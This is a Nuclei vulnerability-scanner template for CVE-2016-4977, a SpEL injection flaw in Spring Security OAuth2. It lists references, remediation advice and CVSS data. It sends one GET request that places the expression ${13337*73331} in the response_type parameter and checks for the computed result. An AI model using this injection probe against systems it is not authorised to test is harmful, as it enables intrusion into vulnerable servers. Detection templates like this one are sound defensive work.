nuclei-templates/http/cves/2016/CVE-2016-4977.yaml

44 lines
1.7 KiB
YAML
Raw Normal View History

2022-01-05 08:37:28 +00:00
id: CVE-2016-4977
info:
2022-01-06 10:06:28 +00:00
name: Spring Security OAuth2 Remote Command Execution
2022-01-05 08:37:28 +00:00
author: princechaddha
severity: high
description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.
2022-01-05 08:37:28 +00:00
reference:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://tanzu.vmware.com/security/cve-2016-4977
2022-01-05 08:37:28 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
- https://pivotal.io/security/cve-2016-4977
2023-07-11 19:49:27 +00:00
- http://www.openwall.com/lists/oss-security/2019/10/16/1
remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2016-4977
cwe-id: CWE-19
2023-07-11 19:49:27 +00:00
epss-score: 0.03345
cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.9012
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: pivotal
product: spring_security_oauth
tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring
2022-01-05 08:37:28 +00:00
http:
2022-01-05 08:37:28 +00:00
- method: GET
path:
- "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Unsupported response types: [978015547]"
- type: status
status:
- 400